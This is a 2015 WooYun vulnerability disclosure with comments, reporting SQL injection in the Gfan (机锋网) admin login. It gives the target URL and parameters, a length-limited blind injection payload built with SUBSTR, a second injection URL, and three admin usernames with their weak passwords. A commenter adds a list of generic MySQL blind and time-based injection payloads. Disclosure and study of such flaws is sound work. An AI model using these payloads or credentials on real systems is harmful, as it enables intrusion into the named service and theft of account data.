机锋网后台存在SQL注入漏洞（注射技巧bypass字符长度限制） | WooYun-2015-101960 | WooYun.org

当前位置：WooYun >> 漏洞信息

漏洞概要关注数(125) 关注此漏洞

缺陷编号： WooYun-2015-101960

漏洞标题：机锋网后台存在SQL注入漏洞（注射技巧bypass字符长度限制）

相关厂商：机锋网

漏洞作者：子非海绵宝宝

提交时间： 2015-03-17 22:34

公开时间： 2015-03-22 22:36

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签：无

31人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-17：细节已通知厂商并且等待厂商处理中
2015-03-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT
感谢@Noxxx 大神的指点
报错注入变成32位字符限制注入

详细说明：

code 区域

http://admin.tsz.gfan.com/login.php?act=logging

code 区域

username=wangxi&password=123&auth=6268

这里的注入比较有意思

报错注入

但是....

他检查了长度也就是说注入的完整语句不能超过32个字符

报错是肯定不够的只能盲注

code 区域

select * from `condorgame_managers` where `username`='123'' LIMIT 1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'' LIMIT 1' at line 1 1064

看下的语句

那么可以这么写

code 区域

duyun'&&SUBSTR(passwd,1,1)='a

使得语句变成

select * from `condorgame_managers` where `username`='duyun'&&SUBSTR(passwd,1,1)='a'

这样语句是29个字符可以注入了

并且可以猜出密码的MD5值

用户名直接使用常用用户名进行爆破

duyun 123456

wangyu 123!@#

wangxi 321321

还都是弱密码

其中wangyu 123!@# 权限较大可以操作的东西比较多

在其中找到新的注入点且没有限制盲注

code 区域

http://admin.tsz.gfan.com/index.php?offset=15&mod=product&act=edit&time=&serverid=1023

漏洞证明：

如上

修复方案：

过滤

版权声明：转载请注明来源子非海绵宝宝@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-03-22 22:36

厂商回复：

漏洞Rank：10 (WooYun评价)

最新状态：

暂无

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2015-03-17 22:36 | Ton7BrEak ( 普通白帽子 | Rank:292 漏洞数:64 | 我要继续努力！)
0

加乌云了~打雷了快回家收衣服啦！mark一下，当做教程。 @水晶好东西，妹纸快来看

1# 回复此人
2015-03-17 22:38 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )
0

强到不行！！

2# 回复此人
2015-03-17 22:43 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
0

。。。。。不玩众测来主站啊

3# 回复此人
2015-03-17 22:44 | 子非海绵宝宝 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
0

@zeracker 无意发现的....就交主站了

4# 回复此人
2015-03-17 22:53 | BMa ( 核心白帽子 | Rank:2014 漏洞数:223 )
0

@子非海绵宝宝 ||这种字符？

5# 回复此人
2015-03-17 23:04 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚，关注互联网安全)
0

NB!

6# 回复此人
2015-03-17 23:48 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步，是要承认问题的存在。)
0

果断关注！

7# 回复此人
2015-03-18 09:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 )
0

雷劈了一下。太乌云了。

8# 回复此人
2015-03-18 09:14 | light ( 普通白帽子 | Rank:261 漏洞数:48 | 精华漏洞数:36 | WooYun认证√ 艺术系教授 ...)
0

mark 坐等神技

9# 回复此人
2015-03-18 09:26 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力，而是努力了才...)
0

围观大神

10# 回复此人
2015-03-18 09:33 | 我哪知道啊 ( 路人 | Rank:0 漏洞数:1 )
0

mark

11# 回复此人
2015-03-18 10:37 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
0

mark学习

12# 回复此人
2015-03-18 11:45 | 3King ( 核心白帽子 | Rank:1158 漏洞数:96 | 【study at HNUST】非常感谢大家的关注~ 大...)
0

6666666

13# 回复此人
2015-03-18 11:45 | 大大灰狼 ( 普通白帽子 | Rank:278 漏洞数:64 | Newbie)
0

mark

14# 回复此人
2015-03-18 11:47 | winalva ( 实习白帽子 | Rank:42 漏洞数:11 | rank是什么？)
0

mark学习

15# 回复此人
2015-03-18 12:13 | 小川 ( 核心白帽子 | Rank:1583 漏洞数:236 | 一个致力要将乌云变成搞笑论坛的男人)
0

学习

16# 回复此人
2015-03-18 14:42 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
0

@子非海绵宝宝 good!

17# 回复此人
2015-03-18 15:35 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
0

666666666

18# 回复此人
2015-03-18 15:47 | gone ( 路人 | Rank:0 漏洞数:1 | 来学习的)
0

学习

19# 回复此人
2015-03-19 11:06 | 水晶 ( 实习白帽子 | Rank:58 漏洞数:22 | 热爱生活，喜欢互联网)
0

@Ton7BrEak OK

20# 回复此人
2015-03-19 15:58 | 子非海绵宝宝 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
0

@机锋网后交的都确认了这个怎么没确认?

21# 回复此人
2015-03-22 20:17 | 子非海绵宝宝 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
0

@xsser 求补RANK

22# 回复此人
2015-03-22 22:40 | 机锋网(乌云厂商)
0

确认，正在解决，谢谢了

23# 回复此人
2015-03-22 22:54 | 子非海绵宝宝 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
0

@机锋网超时后4分钟就回复了....还我RANK....双倍!

24# 回复此人
2015-03-22 23:08 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )
0

@子非海绵宝宝深藏功与名

25# 回复此人
2015-03-22 23:08 | 鸟云厂商 ( 核心白帽子 | Rank:1504 漏洞数:156 )
0

这个确实改补

26# 回复此人
2015-03-22 23:10 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )
0

有点意思啊.

27# 回复此人
2015-03-23 00:16 | Knight ( 实习白帽子 | Rank:66 漏洞数:11 | 刚刚上洗手间，看到一个玉树临风的少年，气...)
0

目测穿山甲。

28# 回复此人
2015-03-23 08:19 | BMa ( 核心白帽子 | Rank:2014 漏洞数:223 )
0

@子非海绵宝宝看来我说对了，|| &&

29# 回复此人
2015-03-23 09:19 | 水晶 ( 实习白帽子 | Rank:58 漏洞数:22 | 热爱生活，喜欢互联网)
0

@Ton7BrEak OK

30# 回复此人
2015-03-23 09:27 | zzR ( 核心白帽子 | Rank:1408 漏洞数:125 | 东方红＊＊联盟欢迎你－0-)
0

故意的╭(╯^╰)╮

31# 回复此人
2015-03-23 09:30 | Ton7BrEak ( 普通白帽子 | Rank:292 漏洞数:64 | 我要继续努力！)
0

厂商忽略的好啊~提前学到了~ （洞主很无奈啊！）

32# 回复此人
2015-03-23 16:28 | xtnnd ( 普通白帽子 | Rank:184 漏洞数:45 | t-safe)
0

@疯狗求审核 http://www.wooyun.org/bugs/wooyun-2015-0100938/trace/ab0e5e5792df40ff91c799a791437d73 http://www.wooyun.org/bugs/wooyun-2015-0103231/trace/81e4491c6f9b67c90badb817042f0a01

33# 回复此人
2015-03-23 19:07 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)
0

学习了！

34# 回复此人
2015-03-26 13:03 | me1ody ( 普通白帽子 | Rank:121 漏洞数:35 | 乌云临时工)
0

学习了玩游戏

35# 回复此人
2015-03-28 09:46 | 炮灰乙 ( 路人 | Rank:8 漏洞数:5 | 我叫路人甲，我住在中国)
0

这没有bypass啊只能爆密码我还以为从其它参数配合带进sql语句或者把一条sql拆成N条

36# 回复此人
2015-04-03 00:51 | _Evil ( 普通白帽子 | Rank:431 漏洞数:61 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
0

mid(data,1,1) = 'a'# substring(data,1,1) = 'a'# AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now()))) ' or 1 rlike '1 Some functions allow to search substrings: '-if(locate('f',data),1,0)# '-if(locate('fo',data),1,0)# '-if(locate('foo',data),1,0)# ● Some functions allow to cut substrings: length(trim(leading 'a' FROM data)) # length will be shorter length(replace(data, 'a', '')) # length will be shorter

37# 回复此人
2015-08-20 19:52 | Burn Egg ( 实习白帽子 | Rank:80 漏洞数:10 | 经验，范围，字典，思维)
0

@子非海绵宝宝长度限制应该也可以用passwd like 'a%'，，

38# 回复此人

登录后才能发表评论，请先登录。